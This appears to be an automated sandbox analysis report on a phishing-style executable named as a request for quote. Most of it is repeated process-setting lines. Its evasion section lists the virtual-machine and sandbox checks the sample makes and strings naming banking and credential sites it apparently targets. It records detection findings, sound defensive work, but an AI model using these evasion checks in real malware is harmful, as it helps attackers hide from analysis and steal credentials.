                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: RFQ_TFS-1508-AL NASR ENGINEERING.exe PID: 5276, type: MEMORYSTR
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeMemory allocated: 2DBA8C40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeMemory allocated: 2DBC27A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 6E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 2860000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: A00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6146Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3444Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 2646Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 4588Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7316Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1644Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1276Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: Amcache.hve.10.drBinary or memory string: VMware
                    Source: tmpE9F2.tmp.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: tmpE9F2.tmp.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: tmpE9F2.tmp.5.drBinary or memory string: global block list test formVMware20,11696428655
                    Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                    Source: tmpE9F2.tmp.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: tmpE9F2.tmp.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: Amcache.hve.10.drBinary or memory string: vmci.sys
                    Source: tmpE9F2.tmp.5.drBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: tmpE9F2.tmp.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: tmpE9F2.tmp.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: tmpE9F2.tmp.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: tmpE9F2.tmp.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: Amcache.hve.10.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: tmpE9F2.tmp.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: tmpE9F2.tmp.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: tmpE9F2.tmp.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: tmpE9F2.tmp.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
                    Source: tmpE9F2.tmp.5.drBinary or memory string: discord.comVMware20,11696428655f
                    Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: tmpE9F2.tmp.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: tmpE9F2.tmp.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: tmpE9F2.tmp.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: tmpE9F2.tmp.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: tmpE9F2.tmp.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: tmpE9F2.tmp.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: tmpE9F2.tmp.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: tmpE9F2.tmp.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
